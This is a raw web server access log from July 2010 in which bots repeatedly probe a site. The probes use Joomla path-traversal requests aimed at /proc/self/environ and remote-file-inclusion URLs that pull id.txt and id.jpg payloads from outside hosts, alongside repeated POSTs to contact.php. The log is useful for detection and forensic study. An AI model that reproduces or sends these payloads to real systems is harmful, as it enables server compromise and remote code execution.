91.121.78.216 - - [31/Jul/2010:05:08:42 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:08:56 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:09:04 -0700] "GET /logs/access_100628.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:09:06 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:09:21 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:09:26 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:09:33 -0700] "GET /logs/access_100612.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:09:46 -0700] "GET /logs/access_100613.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:09:47 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:09:47 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
189.21.153.139 - - [31/Jul/2010:05:10:09 -0700] "GET /logs/access_100624.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:11:03 -0700] "GET /logs/access_100612.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:05:11:20 -0700] "GET /logs/access_100221.log////?_SERVER[DOCUMENT_ROOT]=http://outsider-bg.com/_DOC/pid? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:11:21 -0700] "GET /logs/access_100217.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:11:21 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:11:22 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:12:16 -0700] "GET /logs/access_100228.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:12:16 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:12:16 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:12:26 -0700] "GET /logs/access_100612.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.208.211.151 - - [31/Jul/2010:05:12:27 -0700] "POST /logs/access_100711.log/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
91.208.211.151 - - [31/Jul/2010:05:12:27 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
91.208.211.151 - - [31/Jul/2010:05:12:28 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
64.202.247.2 - - [31/Jul/2010:05:12:41 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
64.202.247.2 - - [31/Jul/2010:05:12:41 -0700] "POST /logs/access_100719.log/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
64.202.247.2 - - [31/Jul/2010:05:12:41 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
66.71.245.122 - - [31/Jul/2010:05:12:57 -0700] "POST /logs/access_100720.log/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
66.71.245.122 - - [31/Jul/2010:05:12:57 -0700] "POST /logs/access_100720.log/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
66.71.245.122 - - [31/Jul/2010:05:12:57 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
66.71.245.122 - - [31/Jul/2010:05:12:57 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
66.71.245.122 - - [31/Jul/2010:05:12:57 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
66.71.245.122 - - [31/Jul/2010:05:12:57 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
64.202.247.2 - - [31/Jul/2010:05:13:00 -0700] "POST /logs/access_100712.log/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
64.202.247.2 - - [31/Jul/2010:05:13:05 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
64.202.247.2 - - [31/Jul/2010:05:13:05 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
64.202.247.2 - - [31/Jul/2010:05:13:08 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
91.201.66.120 - - [31/Jul/2010:05:13:12 -0700] "GET /logs/access_100407.log HTTP/1.1" 200 1302739 "http://www.puaga.com/logs/access_100407.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.puaga.com"
64.202.247.2 - - [31/Jul/2010:05:13:24 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
64.202.247.2 - - [31/Jul/2010:05:13:24 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
64.202.247.2 - - [31/Jul/2010:05:13:25 -0700] "POST /logs/access_100719.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:13:27 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:13:27 -0700] "GET /logs/access_100217.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:13:27 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.250 - - [31/Jul/2010:05:13:34 -0700] "GET /logs/access_100621.log HTTP/1.0" 200 2859664 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:13:37 -0700] "GET /logs/access_100217.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:13:37 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:13:37 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
64.202.247.2 - - [31/Jul/2010:05:13:58 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:14:09 -0700] "GET /logs/access_100313.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:14:40 -0700] "GET /logs/access_100612.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
79.110.112.210 - - [31/Jul/2010:05:14:49 -0700] "POST /logs/access_100712.log//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
79.110.112.210 - - [31/Jul/2010:05:14:49 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
79.110.112.210 - - [31/Jul/2010:05:14:49 -0700] "POST /logs//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
79.110.112.210 - - [31/Jul/2010:05:14:51 -0700] "POST /logs/access_100712.log//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
79.110.112.210 - - [31/Jul/2010:05:14:51 -0700] "POST /logs//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
79.110.112.210 - - [31/Jul/2010:05:14:51 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:15:53 -0700] "GET /logs/access_100402.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:05:15:57 -0700] "GET /logs/access_100501.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:05:15:57 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:05:15:57 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:05:16:20 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:05:17:01 -0700] "GET /logs/access_100307.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
213.180.89.75 - - [31/Jul/2010:05:18:34 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.805" "www.puaga.com"
91.208.211.151 - - [31/Jul/2010:05:19:03 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
91.208.211.151 - - [31/Jul/2010:05:19:18 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
91.208.211.151 - - [31/Jul/2010:05:19:18 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:05:19:56 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:05:20:02 -0700] "GET /logs/access_100606.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:05:20:02 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:05:20:02 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:05:20:33 -0700] "POST /logs/access_100710.log//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:05:20:34 -0700] "POST /logs//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:20:34 -0700] "GET /logs/access_100415.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:20:34 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:20:34 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:05:20:34 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:05:20:35 -0700] "POST /logs/access_100710.log//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:05:20:37 -0700] "POST /logs//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:05:20:38 -0700] "POST /logs/access_100710.log//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:05:20:38 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:05:20:39 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:05:20:40 -0700] "POST /logs//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:05:20:46 -0700] "POST /logs/access_100705.log//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:05:20:47 -0700] "POST /logs/access_100705.log//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:05:20:50 -0700] "POST /logs/access_100705.log//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:05:20:52 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:05:20:52 -0700] "POST /logs//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:05:20:55 -0700] "POST /logs/access_100710.log%20%20//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
205.251.131.33 - - [31/Jul/2010:05:21:27 -0700] "POST /logs/access_100705.log%20%20//contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:05:21:36 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:21:58 -0700] "GET /logs/access_100626.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:21:59 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:21:59 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.208.211.151 - - [31/Jul/2010:05:22:01 -0700] "POST /logs/access_100711.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
122.155.9.169 - - [31/Jul/2010:05:22:15 -0700] "GET /logs/access_100531.log/nullpo/hsList.php?subdir=http://aqws.interfree.it/id.jpg?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
122.155.9.169 - - [31/Jul/2010:05:22:17 -0700] "GET /nullpo/hsList.php?subdir=http://aqws.interfree.it/id.jpg?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
122.155.9.169 - - [31/Jul/2010:05:22:18 -0700] "GET /logs//nullpo/hsList.php?subdir=http://aqws.interfree.it/id.jpg?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:22:41 -0700] "GET /logs/access_100626.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:22:42 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:22:42 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:23:12 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:23:12 -0700] "GET /logs/access_100208.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:23:12 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:23:17 -0700] "GET /logs/access_100616.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:23:32 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:23:32 -0700] "GET /logs/access_100208.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:23:32 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:23:36 -0700] "GET /logs/access_100616.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
